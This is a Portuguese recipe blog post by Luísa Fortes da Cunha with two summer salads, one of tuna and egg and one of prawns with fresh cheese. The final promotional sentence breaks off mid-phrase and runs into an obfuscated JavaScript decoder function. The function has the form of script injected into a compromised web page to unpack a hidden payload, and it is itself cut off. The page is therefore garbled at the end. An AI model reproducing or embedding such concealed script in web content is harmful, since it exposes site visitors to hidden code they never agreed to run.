2 saladas de verão por Luísa Fortes da Cunha
Salada de atum com ovo cozido, rúcula, alface, tomate, pepino, manjericão
Ingredientes
6 Folhas de alface em pedaços
3 Ovos cozidos cortados
2-3 Latas de atum
2 Tomates
Rúcula a gosto
1 Pepino cortado às rodelas
Folhas de manjericão a gosto
Sal e pimenta a gosto
Temperar com azeite e vinagre balsâmico
Preparação
Comece por colocar a alface e a rúcula num pirex.
Depois vá juntando todos os outros ingredientes.
Tempere com sal, pimenta, azeite e vinagre balsâmico ao seu gosto.
Salada de camarão com queijo fresco
Ingredientes
1 Alface
2 Tomates
1 Cebola
2 Queijos frescos
400 g camarões grandes cozidos
Salsa manjericão e coentros picados qb.
Preparação
Comece por colocar a alface e a cebola cortada num pirex.
Depois vá juntando todos os outros ingredientes.
Tempere com sal, pimenta, azeite e vinagre balsâmico ao seu gosto.
Delicie-se. ?
—
Mais receitas de Luísa Fortes da Cunha em:
https://www.facebook.com/mycasualbrunch/
http://mycasualbrunch.blogspot.pt/
Se gostou de conhecer estas 2 saladas de Luísa Fortes da Cunha, acompanhe estas receitas com estas 3 águas detox e com este gelado com 0% de gordura. Enquanto prepara as saladas aumente o som do seu computador e oiça as function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa